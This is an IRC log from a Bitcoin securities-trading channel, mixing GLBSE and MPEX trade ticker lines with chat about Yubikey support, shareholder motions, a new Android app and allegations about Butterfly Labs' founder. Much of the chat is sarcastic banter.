0.128 = 1.28 BTC [-] Sep 18 23:37:05 [GLBSE] [SS] 25 @ 0.02 = 0.5 BTC [-] Sep 18 23:38:42 [GLBSE] [YARR] 1 @ 1.1 BTC [+] Sep 18 23:38:43 [GLBSE] [YARR] 1 @ 1.26 BTC [+] Sep 18 23:43:02 [GLBSE] [OBSI.HRPT] 7 @ 0.10284999 = 0.7199 BTC [+] Sep 18 23:43:04 [GLBSE] [OBSI.HRPT] 4 @ 0.10285 = 0.4114 BTC [+] Sep 18 23:46:58 [MPEX] [F.GIGA.ETF] 5508 @ 0.00028313 = 1.5595 BTC [-] Sep 18 23:46:59 [MPEX] [F.GIGA.ETF] 3492 @ 0.00028085 = 0.9807 BTC [-] Sep 18 23:51:52 hey nefario, why is motion 104 up on DMC? Sep 18 23:52:25 [GLBSE] [OBSI.HRPT] 7 @ 0.10285 = 0.72 BTC [+] Sep 18 23:53:16 the one about stopping dividends for 3 months Sep 18 23:53:34 [GLBSE] [TYGRR.BOND-P] 146 @ 0.052 = 7.592 BTC [+] Sep 18 23:53:36 [GLBSE] [TYGRR.BOND-P] 104 @ 0.05102 = 5.3061 BTC [-] Sep 18 23:55:37 [GLBSE] [OBSI.HRPT] 9 @ 0.10285 = 0.9257 BTC [+] Sep 18 23:55:38 [GLBSE] [OBSI.HRPT] 34 @ 0.1029 = 3.4986 BTC [+] Sep 18 23:56:11 [GLBSE] [TYGRR.BOND-P] 91 @ 0.05102 = 4.6428 BTC [-] Sep 18 23:56:13 [GLBSE] [TYGRR.BOND-P] 200 @ 0.05101 = 10.202 BTC [-] Sep 18 23:56:14 [GLBSE] [TYGRR.BOND-P] 200 @ 0.0504 = 10.08 BTC [-] Sep 18 23:56:15 [GLBSE] [TYGRR.BOND-P] 9 @ 0.0500005 = 0.45 BTC [-] Sep 18 23:57:10 [GLBSE] [NASTY] 1 @ 0.5195 BTC [+] Sep 18 23:57:11 [GLBSE] [NASTY] 4 @ 0.5199 = 2.0796 BTC [+] Sep 18 23:57:23 [GLBSE] [FOO.PPPPT] 101 @ 0.05000001 = 5.05 BTC [-] Sep 18 23:57:24 [GLBSE] [FOO.PPPPT] 10 @ 0.05 = 0.5 BTC [-] Sep 18 23:57:26 [GLBSE] [FOO.PPPPT] 17 @ 0.05 = 0.85 BTC [-] Sep 18 23:57:27 [GLBSE] [NASTY] 1 @ 0.4505 BTC [-] Sep 18 23:57:29 [GLBSE] [NASTY] 10 @ 0.45 = 4.5 BTC [-] Sep 18 23:57:30 [GLBSE] [NASTY] 1 @ 0.4465 BTC [-] Sep 18 23:57:31 [GLBSE] [NASTY] 1 @ 0.445 BTC [-] Sep 18 23:57:33 [GLBSE] [NASTY] 10 @ 0.44 = 4.4 BTC [-] Sep 18 23:58:16 [GLBSE] [COGNITIVE] 1 @ 0.51 BTC [-] Sep 18 23:58:18 [GLBSE] [COGNITIVE] 8 @ 0.5 = 4 BTC [-] Sep 18 23:58:19 [GLBSE] [COGNITIVE] 2 @ 0.4 = 0.8 BTC [-] Sep 18 23:58:55 [GLBSE] [OBSI.HRPT] 150 @ 0.1029 = 15.435 BTC [+] Sep 18 23:59:07 [GLBSE] [FPGAMINING] 4 @ 0.61599999 = 2.464 BTC [+] Sep 18 23:59:09 [GLBSE] [FPGAMINING] 4 @ 0.616 = 2.464 BTC [+] Sep 18 23:59:10 [GLBSE] [FPGAMINING] 2 @ 0.618 = 1.236 BTC [+] Sep 18 23:59:12 [GLBSE] [FPGAMINING] 6 @ 0.619 = 3.714 BTC [+] Sep 18 23:59:13 [GLBSE] [FPGAMINING] 20 @ 0.6199 = 12.398 BTC [+] Sep 18 23:59:13 [GLBSE] [FPGAMINING] 4 @ 0.68 = 2.72 BTC [+] Sep 18 23:59:14 [GLBSE] [FPGAMINING] 10 @ 0.685 = 6.85 BTC [+] Sep 19 00:01:48 [GLBSE] [BLUECHIP] 2 @ 0.1 = 0.2 BTC [+] Sep 19 00:02:59 [GLBSE] [BLUECHIP] 1 @ 0.09999999 BTC [-] Sep 19 00:03:56 [GLBSE] [BLUECHIP] 1 @ 0.09999999 BTC [-] Sep 19 00:08:32 [GLBSE] [COGNITIVE] 11 @ 0.61 = 6.71 BTC [+] Sep 19 00:11:12 [GLBSE] [OBSI.HRPT] 1 @ 0.1029 BTC [+] Sep 19 00:14:00 [MPEX] [F.GIGA.ETF] 3211 @ 0.00028085 = 0.9018 BTC [-] Sep 19 00:14:02 [MPEX] [F.GIGA.ETF] 8389 @ 0.00028 = 2.3489 BTC [-] Sep 19 00:15:48 [GLBSE] [NASTY] 4 @ 0.5195 = 2.078 BTC [+] Sep 19 00:15:49 [GLBSE] [NASTY] 1 @ 0.5199 BTC [+] Sep 19 00:17:05 [GLBSE] [NYAN.B] 6 @ 0.99 = 5.94 BTC [-] Sep 19 00:17:19 [GLBSE] [FOO.PPPPT] 5 @ 0.05 = 0.25 BTC [-] Sep 19 00:17:38 [GLBSE] [BDK.BND] 3 @ 0.0989 = 0.2967 BTC [+] Sep 19 00:17:40 [GLBSE] [BITCOINTORRENTZ] 10 @ 0.4 = 4 BTC [-] Sep 19 00:18:14 [GLBSE] [NYAN.B] 12 @ 0.99999997 = 12 BTC [+] Sep 19 00:23:37 [GLBSE] [GOLD] 1 @ 0.0090011 BTC [-] Sep 19 00:24:32 I get along vit ze boys, cause I uuuused to be vun Sep 19 00:24:58 DEAR LORD Sep 19 00:25:04 NEFARIO IS A NEFARIETTE Sep 19 00:29:54 [GLBSE] [FUTUREFUND] 1 @ 0.00012936 BTC [+] Sep 19 00:33:00 [MPEX] [O.BTCUSD.C170T] 840 @ 0.05380401 = 45.1954 BTC [+] Sep 19 00:33:42 [GLBSE] [DMC] 4 @ 0.068 = 0.272 BTC [-] Sep 19 00:34:01 [MPEX] [O.BTCUSD.P170T] 840 @ 0.51961089 = 436.4731 BTC [-] Sep 19 00:34:58 https://www.youtube.com/watch?v=s8_I1-ErZSQ Sep 19 00:35:06 how yubikeys are made Sep 19 00:35:12 BY ROBOTS!!! Sep 19 00:35:22 [GLBSE] [YARR] 3 @ 1 = 3 BTC [-] Sep 19 00:35:59 [GLBSE] [DMC] 1 @ 0.04 BTC [-] Sep 19 00:36:51 [GLBSE] [CBGB] 9 @ 0.5 = 4.5 BTC [+] Sep 19 00:38:34 1k keys in that box Sep 19 00:38:42 bout 25k$ worth? Sep 19 00:38:58 imagine what they could do with 2 robots Sep 19 00:39:09 50k in a box Sep 19 00:39:12 lol Sep 19 00:39:15 ... Sep 19 00:39:21 Im just being stupid Sep 19 00:39:27 but it's really really cool Sep 19 00:39:36 seeing it almost totally automated Sep 19 00:40:06 are you going to implement them Sep 19 00:40:24 [GLBSE] [BDK.BND] 1 @ 0.0989 BTC [+] Sep 19 00:43:10 https://www.youtube.com/watch?v=xZWrE8aNqJM Sep 19 00:43:30 nefario1, are you going to support yubikeys Sep 19 00:43:49 also nefario1, question Sep 19 00:43:59 if i have some shares of asset x Sep 19 00:44:10 and theres a motion in place Sep 19 00:44:15 and i vote Sep 19 00:44:21 and then transfer to person y Sep 19 00:44:28 can person y add more votes Sep 19 00:44:34 or what happens Sep 19 00:44:55 do you follow each share around? im guessing noes? Sep 19 00:45:33 do you remove the votes on a motion from transfered shares? Sep 19 00:46:06 nefario1 stop watchin that robot porn and answer ze questions. Sep 19 00:46:23 [GLBSE] [BAKEWELL] 10 @ 0.15 = 1.5 BTC [+] Sep 19 00:46:32 a shuttup bakewell. Sep 19 00:47:33 great. Sep 19 00:48:56 [GLBSE] [DMC] 99 @ 0.04 = 3.96 BTC [-] Sep 19 00:49:11 lol Sep 19 00:49:16 a question for teh ages. Sep 19 00:49:42 nefario1 Sep 19 00:49:46 answer http://pastebin.com/raw.php?i=5ZS5wWWZ Sep 19 00:49:52 [GLBSE] [NYAN.B] 4 @ 0.99999997 = 4 BTC [+] Sep 19 00:50:08 you can skip the last line. Sep 19 00:50:26 and dont ping timeout on me plox Sep 19 00:50:28 [GLBSE] [GIGAMINING] 2 @ 0.6189 = 1.2378 BTC [+] Sep 19 00:56:09 [GLBSE] [FPGA.CONTRACT] 1 @ 0.074985 BTC [+] Sep 19 00:56:37 [GLBSE] [FPGA.CONTRACT] 10 @ 0.074989 = 0.7499 BTC [+] Sep 19 00:57:07 [GLBSE] [GIGAMINING] 2 @ 0.6189 = 1.2378 BTC [+] Sep 19 00:57:52 FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA!!!!!!!!!!!!!!1111 Sep 19 00:58:00 sorry kakobrekla, connection Sep 19 00:58:00 so Sep 19 00:58:12 yubikeys both normal and mtgox ones will be supported Sep 19 00:58:20 mtgox ones? Sep 19 00:58:23 regarding votes Sep 19 00:58:37 mtgox sells mtgox specific yubikeys Sep 19 00:58:41 yes i have one Sep 19 00:58:44 they are Sep 19 00:58:49 _mtgox_ specific Sep 19 00:58:51 ja so you'll be able to use that Sep 19 00:59:05 ... Sep 19 00:59:19 they will allow you to implement your system to theirs? Sep 19 00:59:47 do you know how yubikeys work? Sep 19 01:00:04 i know mtgox yubis cant be used elsewhere, so they say Sep 19 01:00:19 they can Sep 19 01:00:21 it generates a random pass each time Sep 19 01:00:33 and both buttons are taken Sep 19 01:00:34 but you need to specifically implement it to use the mtgox encoded server Sep 19 01:00:48 is this something new? Sep 19 01:00:51 no Sep 19 01:00:59 did tux confirm that? Sep 19 01:01:01 not as far as I know Sep 19 01:01:09 this is how yubikeys work Sep 19 01:01:31 so, did tux say you will have access to mtgox encoded server? Sep 19 01:01:39 he just assumed. Sep 19 01:01:39 I don't have to Sep 19 01:01:51 it runs through yubikey Sep 19 01:02:00 [MPEX] [F.GIGA.ETF] 8600 @ 0.00028 = 2.408 BTC [-] Sep 19 01:02:24 the thing is Sep 19 01:02:29 i have seen this questions asked 100 times Sep 19 01:02:35 the answer was always no Sep 19 01:02:42 but hey suprise me Sep 19 01:02:49 fair enough Sep 19 01:02:53 [GLBSE] [OBSI.HRPT] 3 @ 0.1028 = 0.3084 BTC [-] Sep 19 01:02:56 so Sep 19 01:02:58 about the shares Sep 19 01:03:00 [MPEX] [O.BTCUSD.P150T] 400 @ 0.32962805 = 131.8512 BTC [-] Sep 19 01:03:02 [MPEX] [O.BTCUSD.P140T] 400 @ 0.24330288 = 97.3212 BTC [-] Sep 19 01:03:03 [MPEX] [O.BTCUSD.P130T] 400 @ 0.1663995 = 66.5598 BTC [-] Sep 19 01:03:06 and votes Sep 19 01:04:49 nefario1 ? Sep 19 01:04:51 1 share 1 vote Sep 19 01:04:55 share moves Sep 19 01:04:57 so does the vote Sep 19 01:05:00 [MPEX] [O.BTCUSD.P120T] 930 @ 0.10291703 = 95.7128 BTC [-] Sep 19 01:05:12 heh Sep 19 01:05:21 seems GLBSE does better than a lot of electronic voting systems in the world Sep 19 01:05:42 so new owner can change the vote on his part of the sharecount Sep 19 01:05:57 nefario1: why is motion 104 up on DMC? Sep 19 01:06:14 it's not closed yet Sep 19 01:06:20 kakobrekla: yes Sep 19 01:06:33 Seems like wiping the vote on sale or transfer would be better. Sep 19 01:07:11 i was under the impression it had closed... i'm referring to the one about 3 months of dividends, not the one about diablo as CEO Sep 19 01:07:21 [GLBSE] [GSDPT] 31 @ 0.0034 = 0.1054 BTC [+] Sep 19 01:08:26 that would indeed be smarter Sep 19 01:09:00 novusordo: oh I don't know Sep 19 01:09:08 there are 2 motions up on DMC right now Sep 19 01:09:33 interesting Sep 19 01:09:58 maybe when you went to re-open the CEO motion, you re-opened the dividend one instead? Sep 19 01:10:29 is it one or both of them are open? Sep 19 01:10:49 they appear to both be open Sep 19 01:11:50 [GLBSE] [BFLS.RIG] 1 @ 0.895 BTC [-] Sep 19 01:11:52 [GLBSE] [BFLS.RIG] 4 @ 0.899 = 3.596 BTC [+] Sep 19 01:12:24 nefario1: the CEO motion is set to expire today, and the dividend motion is set to expire on the 22nd Sep 19 01:15:01 [GLBSE] [OBSI.HRPT] 1 @ 0.1028 BTC [-] Sep 19 01:16:25 [GLBSE] [OBSI.HRPT] 3 @ 0.1028 = 0.3084 BTC [-] Sep 19 01:18:12 [GLBSE] [OBSI.HRPT] 8 @ 0.1028 = 0.8224 BTC [-] Sep 19 01:26:56 novusordo: really? Sep 19 01:27:07 hmm Sep 19 01:27:09 whats the id of the ceo motion Sep 19 01:30:21 [GLBSE] [OBSI.HRPT] 1 @ 0.1028 BTC [-] Sep 19 01:31:01 [MPEX] [S.MPOE] 35114 @ 0.0004149 = 14.5688 BTC [+] Sep 19 01:31:02 [MPEX] [S.MPOE] 8886 @ 0.00041512 = 3.6888 BTC [+] Sep 19 01:34:59 [GLBSE] [OBSI.HRPT] 45 @ 0.1028 = 4.626 BTC [-] Sep 19 01:47:52 [GLBSE] [OBSI.HRPT] 6 @ 0.1028 = 0.6168 BTC [-] Sep 19 01:55:13 [GLBSE] [NYAN.C] 2 @ 0.33 = 0.66 BTC [+] Sep 19 01:55:15 [GLBSE] [NYAN.C] 3 @ 0.302 = 0.906 BTC [-] Sep 19 01:55:16 [GLBSE] [NYAN.C] 1 @ 0.301 BTC [-] Sep 19 01:55:18 [GLBSE] [NYAN.C] 3 @ 0.3 = 0.9 BTC [-] Sep 19 01:55:18 [GLBSE] [NYAN.C] 4 @ 0.265 = 1.06 BTC [-] Sep 19 01:55:19 [GLBSE] [NYAN.C] 1 @ 0.26 BTC [-] Sep 19 01:55:20 [GLBSE] [NYAN.C] 1 @ 0.255 BTC [-] Sep 19 01:55:21 [GLBSE] [NYAN.C] 9 @ 0.251 = 2.259 BTC [-] Sep 19 01:55:23 [GLBSE] [NYAN.C] 1 @ 0.25 BTC [-] Sep 19 01:55:24 [GLBSE] [NYAN.C] 23 @ 0.25 = 5.75 BTC [-] Sep 19 01:55:25 [GLBSE] [NYAN.C] 2 @ 0.233 = 0.466 BTC [-] Sep 19 01:57:00 [MPEX] [F.GIGA.ETF] 3865 @ 0.00028 = 1.0822 BTC [-] Sep 19 01:57:01 [MPEX] [F.GIGA.ETF] 5200 @ 0.00027959 = 1.4539 BTC [-] Sep 19 01:57:03 [MPEX] [F.GIGA.ETF] 2135 @ 0.00027657 = 0.5905 BTC [-] Sep 19 01:57:41 [GLBSE] [ZETA-MINING] 4 @ 0.1623 = 0.6492 BTC [-] Sep 19 01:57:42 [GLBSE] [ZETA-MINING] 46 @ 0.1624 = 7.4704 BTC [+] Sep 19 01:57:51 so what happened with DMC? i see the thread gained 20 pages since i last looked Sep 19 01:58:12 shot himself Sep 19 01:58:16 first bitcoin related suicide Sep 19 01:58:23 mollison: nefario put glbse out of business Sep 19 01:58:34 mollison: and somehow I became the King of England Sep 19 01:58:44 not entirely sure how it ended up there either Sep 19 01:59:12 well at least i'm getting both sides of the story Sep 19 01:59:21 lol Sep 19 01:59:56 [GLBSE] [MOVETO.FUND] 2 @ 1.0501 = 2.1002 BTC [-] Sep 19 02:00:45 nefario1 can you verify my passport before you start to charge THE fee ? :> Sep 19 02:00:59 lol Sep 19 02:01:00 no Sep 19 02:01:02 :( Sep 19 02:01:08 think about it Sep 19 02:01:17 if we did that Sep 19 02:01:18 i dont think. Sep 19 02:01:33 how many verifications would we have had to do and then not get paid as a result Sep 19 02:01:33 so far Sep 19 02:01:46 every time we've done a verification and not charged the fee Sep 19 02:01:59 they never go and actually create the asset Sep 19 02:02:05 lol Sep 19 02:02:20 [GLBSE] [BMF] 2 @ 0.74 = 1.48 BTC [+] Sep 19 02:02:30 it used to be a huge waste of our time until we stopped Sep 19 02:03:27 [GLBSE] [OBSI.HRPT] 6 @ 0.1028 = 0.6168 BTC [-] Sep 19 02:03:38 [GLBSE] [NASTY] 1 @ 0.5199 BTC [+] Sep 19 02:05:36 [GLBSE] [FUTUREFUND] 927 @ 0.00012936 = 0.1199 BTC [+] Sep 19 02:08:58 someone just sent me a screenshot of mspaint with a paste of cmd.exe with a ping in it Sep 19 02:09:41 they wanted to show you they didnt temper with the text Sep 19 02:10:14 [MPEX] [O.BTCUSD.P110N] 4 @ 0.1969945 = 0.788 BTC [-] Sep 19 02:12:31 its imbedded in lookout so probably Sep 19 02:13:12 this is not the weirdest but its a doozy Sep 19 02:13:58 I've had a zipped word doc with a screenshot of a desktop with an rdp session to a mac with a traceroute on it Sep 19 02:14:21 and various others Sep 19 02:15:57 uniq Sep 19 02:16:01 derp Sep 19 02:16:34 lol Sep 19 02:16:57 do you work in support or something dub Sep 19 02:16:58 hhmmmm Sep 19 02:17:01 brazilian nuts Sep 19 02:18:02 somewhat, this guy is an engineer in another internal dept, previous ones were when I was closer to end customers Sep 19 02:20:11 Smoovious: google docs are your friend Sep 19 02:20:39 Looks like pirate is converting all his zeek payouts back to coins to pay everyone off, with accumulated interest. Exciting times! Sep 19 02:22:20 thanx! Sep 19 02:34:59 [GLBSE] [PAJKA.BOND] 6 @ 0.0815 = 0.489 BTC [-] Sep 19 02:36:51 pirates paid out? PIRATES PAID OUT??????!!!!! Sep 19 02:37:00 [MPEX] [S.MPOE] 10869 @ 0.00041464 = 4.5067 BTC [-] Sep 19 02:37:02 [GLBSE] [ASICMINER] 1 @ 0.1159998 BTC [+] Sep 19 02:37:30 oh tru Sep 19 02:37:38 no he does not Sep 19 02:38:09 bitcoinica paid out too Sep 19 02:38:33 the sky is falling Sep 19 02:38:38 and mybitcoin Sep 19 02:38:41 The hobo on my street too. Sep 19 02:38:51 He's paying out 1 million dollar bills Sep 19 02:38:56 and allinvain found his bitcoins Sep 19 02:39:16 and MNW paid his bet Sep 19 02:39:33 and intersango found thier backups Sep 19 02:39:52 and mtgox got unhacked Sep 19 02:39:58 and Xenu came back and exploded Luke-Jr in a volcano Sep 19 02:39:59 WOW Sep 19 02:40:12 and all ur base .. Sep 19 02:42:25 [GLBSE] [ASICMINER] 3 @ 0.11245 = 0.3374 BTC [-] Sep 19 02:42:27 [GLBSE] [ASICMINER] 5 @ 0.11241 = 0.5621 BTC [-] Sep 19 02:42:27 [GLBSE] [ASICMINER] 10 @ 0.1124 = 1.124 BTC [-] Sep 19 02:42:53 oh and BFL shipped some asic Sep 19 02:43:30 [GLBSE] [DMC] 1 @ 0.04 BTC [-] Sep 19 02:45:17 I got mine this morning Sep 19 02:45:48 ahhh finally the http://bitcoin.sipa.be charts are fixed Sep 19 02:46:42 smart Sep 19 02:46:47 8 ports? Sep 19 02:46:56 I only got a 7 port hum Sep 19 02:46:57 hub Sep 19 02:47:51 fuck Sep 19 02:47:59 you guys made my heart skip a beat Sep 19 02:48:04 :/ Sep 19 02:49:59 [GLBSE] [MU] 5 @ 0.23 = 1.15 BTC [-] Sep 19 02:52:26 [GLBSE] [MU] 2 @ 0.233 = 0.466 BTC [+] Sep 19 02:57:48 [GLBSE] [JLP-BMD] 4 @ 0.0849 = 0.3396 BTC [-] Sep 19 03:00:09 ugh Sep 19 03:00:59 https://bitcointalk.org/index.php?topic=109515.msg1202299#msg1202299 Sep 19 03:00:59 [MPEX] [O.BTCUSD.P180N] 1 @ 0.73090418 BTC [-] Sep 19 03:04:53 [GLBSE] [OBSI.HRPT] 4 @ 0.1028 = 0.4112 BTC [-] Sep 19 03:05:38 [GLBSE] [007] 20 @ 0.09 = 1.8 BTC [+] Sep 19 03:05:38 [GLBSE] [007] 38 @ 0.082 = 3.116 BTC [-] Sep 19 03:05:50 [GLBSE] [GIGAMINING] 1 @ 0.6189 BTC [+] Sep 19 03:05:57 Obsi: so, did you notice? Sep 19 03:06:01 nefario pushed the date back Sep 19 03:06:11 which date? Sep 19 03:06:24 for motion 127 Sep 19 03:06:43 the one to kick you out of DMC? Sep 19 03:07:04 [GLBSE] [PUREMINING] 3 @ 0.0945 = 0.2835 BTC [+] Sep 19 03:07:06 [GLBSE] [PUREMINING] 13 @ 0.094 = 1.222 BTC [-] Sep 19 03:07:07 [GLBSE] [PUREMINING] 1 @ 0.0935 BTC [-] Sep 19 03:07:08 [GLBSE] [PUREMINING] 6 @ 0.0934 = 0.5604 BTC [-] Sep 19 03:07:09 [GLBSE] [PUREMINING] 14 @ 0.0934 = 1.3076 BTC [-] Sep 19 03:07:10 [GLBSE] [PUREMINING] 13 @ 0.093355 = 1.2136 BTC [-] Sep 19 03:07:47 Obsi: yes Sep 19 03:07:48 I haven't been keeping up on it, did they do an audit? Sep 19 03:07:54 Obsi: sssh, hes back Sep 19 03:07:59 ooh yea Sep 19 03:08:22 [GLBSE] [OBSI.HRPT] 22 @ 0.1028 = 2.2616 BTC [-] Sep 19 03:08:23 [GLBSE] [OBSI.HRPT] 70 @ 0.10285 = 7.1995 BTC [+] Sep 19 03:08:27 Diablo-D3: ^ see that link? Sep 19 03:08:36 yeah Sep 19 03:08:47 crazy stuff Sep 19 03:09:00 and why do you think I dont trust bfl? Sep 19 03:09:23 that's the location their geocodes in pictures were too Sep 19 03:11:35 What? Sep 19 03:12:36 Obsi: wait, so they've confirmed its an altera hardcopy? Sep 19 03:12:59 not real sure, I'm more concerned about the whole doing time for mail fraud thing Sep 19 03:13:18 when did you know Sep 19 03:13:20 to be honest Sep 19 03:13:32 if I knew it was this easy to run scams, I would have been a billionare YEEAAARSS ago Sep 19 03:13:50 Diablo-D3, never too late to start scamming! Sep 19 03:13:54 kakobrekla: right! Sep 19 03:14:11 ANNOUNCEMENT: DMC IS MAKING 50GH FOR A DOLLAR MACHINES Sep 19 03:14:16 jesus thats grim Sep 19 03:14:20 lol Sep 19 03:14:41 man, butterfly labs is hilarious Sep 19 03:15:12 [GLBSE] [RSM] 1 @ 0.29999999 BTC [+] Sep 19 03:15:14 wgat fibt are tget ysubg Sep 19 03:15:17 er Sep 19 03:15:20 what font are they using Sep 19 03:15:25 it seems to be open sans Sep 19 03:15:31 http://www.butterflylabs.com/landing/ Sep 19 03:15:32 lol it is Sep 19 03:18:50 [GLBSE] [GIGAMINING] 7 @ 0.6189 = 4.3323 BTC [+] Sep 19 03:18:52 [GLBSE] [GIGAMINING] 9 @ 0.619 = 5.571 BTC [+] Sep 19 03:18:53 [GLBSE] [GIGAMINING] 22 @ 0.62 = 13.64 BTC [+] Sep 19 03:22:04 [GLBSE] [PUREMINING] 3 @ 0.09599999 = 0.288 BTC [+] Sep 19 03:22:24 [GLBSE] [BLUECHIP] 1 @ 0.09999999 BTC [-] Sep 19 03:24:39 Wait, what are you guys talking about? Sep 19 03:24:47 selling 17 COGNITIVE shares for 0.622 btc beach, anyone interested? Sep 19 03:24:53 BFL Sonny did time for mail fraud Sep 19 03:24:59 [GLBSE] [OBSI.HRPT] 1 @ 0.10285 BTC [+] Sep 19 03:25:08 https://bitcointalk.org/index.php?topic=109515.0 Sep 19 03:27:01 thats not clear Sep 19 03:27:11 What proof do you have? It just links to someone called Sonny Sep 19 03:27:28 with documents saying he got nailed for fraud... Sep 19 03:27:39 and a registration in Wyoming? Sep 19 03:27:42 Read the thread Sep 19 03:28:05 then go find the other thread with the metadata from posted pictures showing the same location Sep 19 03:28:18 posted pictures of the singles being made, etc Sep 19 03:29:44 The link isn't exactly tenuous. BFL is registered in Wyoming, you can find the thread where the RA expired and people freaked out Sep 19 03:29:59 [MPEX] [F.GIGA.ETF] 1300 @ 0.00027657 = 0.3595 BTC [-] Sep 19 03:30:39 The metadata was in Kansas City, Missouri Sep 19 03:30:49 Why is it a Wyoming registration? Sep 19 03:30:59 [MPEX] [O.BTCUSD.P200T] 1 @ 0.81030959 BTC [-] Sep 19 03:31:08 I remember their metadata showing a location very near to the PO box on their contact us page. Sep 19 03:31:10 at the exact location of the address listed in the filing Sep 19 03:31:54 [GLBSE] [FUTUREFUND] 79 @ 0.00012936 = 0.0102 BTC [+] Sep 19 03:34:39 True Sep 19 03:36:09 Looks like it shows the guy's adress is exactly where the geolocation shows... Sep 19 03:37:02 be interesting to see if there is a responce Sep 19 03:37:31 its a pretty fucking elaborate scam Sep 19 03:37:34 that's all we need is another massive failure Sep 19 03:38:08 inb4 mining bond crash Sep 19 03:38:29 Not sure when his probation ends, but the competition might be able to attack their business since they took preorders Sep 19 03:39:26 "or any other business involving the solicitation of funds or cold-calls to customers without the express approval of the Probation Officer " Sep 19 03:53:06 [GLBSE] [OBSI.HRPT] 1 @ 0.10285 BTC [+] Sep 19 03:56:59 [MPEX] [F.GIGA.ETF] 4764 @ 0.00027657 = 1.3176 BTC [-] Sep 19 03:57:00 [MPEX] [F.GIGA.ETF] 4436 @ 0.0002737 = 1.2141 BTC [-] Sep 19 04:11:36 "Sonny Chris Vleisides, 39, previously of Kansas City, MO was arrested in 2007 and held two years in Italy before he was extradited to the United States. Vleisides was sentenced to 14 months in prison followed by three years supervised release after pleading to one count of mail fraud." Sep 19 04:12:04 So in 2009 he's extradited to the US, sentenced for 14 months. Sep 19 04:12:22 So probably in 2010, he has 3 years supervised release Sep 19 04:14:43 I guess that's the guy =/ Sep 19 04:15:11 Everything match and I doubt there's another Sonny Vleiside around Missouri... Sep 19 04:17:46 [GLBSE] [OBSI.HRPT] 25 @ 0.10285 = 2.5713 BTC [+] Sep 19 04:18:48 [GLBSE] [OBSI.HRPT] 2 @ 0.10285 = 0.2057 BTC [+] Sep 19 04:22:59 [MPEX] [S.MPOE] 14200 @ 0.00041332 = 5.8691 BTC [-] Sep 19 04:23:00 [MPEX] [S.MPOE] 13700 @ 0.00041297 = 5.6577 BTC [-] Sep 19 04:29:12 [GLBSE] [DI.BFLSC.SUCCEED] 90 @ 0.001 = 0.09 BTC Sep 19 04:29:18 [GLBSE] [TYGRR.BOND-P] 42 @ 0.0500005 = 2.1 BTC [-] Sep 19 04:30:05 [GLBSE] [FOO.PPPPT] 40 @ 0.05 = 2 BTC [-] Sep 19 04:31:11 [GLBSE] [OBSI.HRPT] 9 @ 0.102895 = 0.9261 BTC [+] Sep 19 04:31:12 [GLBSE] [OBSI.HRPT] 3 @ 0.102899 = 0.3087 BTC [+] Sep 19 04:31:13 [GLBSE] [OBSI.HRPT] 28 @ 0.1029 = 2.8812 BTC [+] Sep 19 04:33:25 [GLBSE] [DI.BFLSC.SUCCEED] 300 @ 0.001 = 0.3 BTC Sep 19 04:37:16 [GLBSE] [BITBOND] 7 @ 0.3348 = 2.3436 BTC [-] Sep 19 04:37:18 [GLBSE] [BITBOND] 8 @ 0.3349 = 2.6792 BTC [+] Sep 19 04:37:19 [GLBSE] [BITBOND] 2 @ 0.3349001 = 0.6698 BTC [+] Sep 19 04:37:20 [GLBSE] [BITBOND] 3 @ 0.3689 = 1.1067 BTC [+] Sep 19 04:37:22 [GLBSE] [BITBOND] 9 @ 0.369 = 3.321 BTC [+] Sep 19 04:44:01 [GLBSE] [OBSI.HRPT] 6 @ 0.1029 = 0.6174 BTC [+] Sep 19 04:49:09 [MPEX] [S.MPOE] 43600 @ 0.00041297 = 18.0055 BTC [-] Sep 19 04:56:47 [GLBSE] [BFLS] 5 @ 0.75 = 3.75 BTC [-] Sep 19 04:58:05 [GLBSE] [BFLS] 2 @ 0.72 = 1.44 BTC [-] Sep 19 04:58:56 [GLBSE] [BFLS] 2 @ 0.715 = 1.43 BTC [-] Sep 19 04:59:12 [GLBSE] [OBSI.HRPT] 6 @ 0.1029 = 0.6174 BTC [+] Sep 19 05:01:09 [GLBSE] [BIF.5-10.MININGBOND] 10 @ 0.74 = 7.4 BTC [-] Sep 19 05:01:48 new front page for GLBSE Sep 19 05:01:54 you need to logout to see Sep 19 05:02:12 [GLBSE] [BIF.5-10.MININGBOND] 2 @ 0.75 = 1.5 BTC [+] Sep 19 05:05:43 yeehaa Sep 19 05:06:19 GLBSE for android eh? Sep 19 05:07:09 I gave up waiting for it load Sep 19 05:10:12 [GLBSE] [BFLS.RIG] 1 @ 0.899 BTC [+] Sep 19 05:14:12 [GLBSE] [ASICMINER] 6 @ 0.1157 = 0.6942 BTC [+] Sep 19 05:14:13 [GLBSE] [ASICMINER] 4 @ 0.1158 = 0.4632 BTC [+] Sep 19 05:14:59 [MPEX] [S.MPOE] 1100 @ 0.00041102 = 0.4521 BTC [-] Sep 19 05:15:00 [MPEX] [S.MPOE] 14431 @ 0.00041388 = 5.9727 BTC [+] Sep 19 05:15:02 [MPEX] [S.MPOE] 28969 @ 0.00041512 = 12.0256 BTC [+] Sep 19 05:19:30 [GLBSE] [BBBB] 11 @ 0.0002 = 0.0022 BTC [+] Sep 19 05:21:13 [GLBSE] [FUTUREFUND] 1 @ 0.00012936 BTC [+] Sep 19 05:22:06 [GLBSE] [PAJKA.BOND] 3 @ 0.0815 = 0.2445 BTC [-] Sep 19 05:26:44 yeah seens to be taking it's sweet time Sep 19 05:26:51 guess it's downloading the internet Sep 19 05:27:47 maybe backing up the blockchain for everyone Sep 19 05:36:58 unlikely to be a backup, you're part of intersango right? Sep 19 05:37:08 oO, glbse for android Sep 19 05:38:09 nefario2: why does it want to mess with accounts on my device? o.O Sep 19 05:38:28 your accounts api Sep 19 05:38:32 it's safe Sep 19 05:38:35 ah Sep 19 05:38:39 all it can do is buy and sell Sep 19 05:38:42 for storing credentials Sep 19 05:38:49 there is a qrcode for this Sep 19 05:39:15 looks fun on my nexus 7 Sep 19 05:40:12 [GLBSE] [RSM] 2 @ 0.29999999 = 0.6 BTC [+] Sep 19 05:40:13 [GLBSE] [RSM] 3 @ 0.3 = 0.9 BTC [+] Sep 19 05:40:26 enjoy Sep 19 05:40:29 send some btc to the developer Sep 19 05:40:34 cool guy Sep 19 05:40:42 warm heart etc. Sep 19 05:40:47 looks good on my s3 too:) Sep 19 05:41:58 [MPEX] [S.MPOE] 4500 @ 0.00041512 = 1.868 BTC [+] Sep 19 05:42:23 xD Sep 19 05:52:18 [GLBSE] [JTME] 1 @ 0.74897899 BTC [-] Sep 19 06:04:58 [MPEX] 